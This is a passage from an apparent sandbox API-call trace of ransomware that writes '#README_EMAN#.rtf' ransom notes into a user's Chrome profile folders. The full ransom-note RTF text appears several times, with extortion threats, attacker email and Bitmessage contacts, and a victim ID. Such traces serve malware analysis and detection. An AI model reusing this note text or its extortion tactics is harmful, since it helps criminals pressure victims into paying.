ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.792] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.793] CloseHandle (hObject=0x284) returned 1 [0269.793] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0x20 [0269.793] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\#readme_eman#.rtf")) returned 0xffffffff [0269.793] GetLastError () returned 0x2 [0269.793] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.793] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet 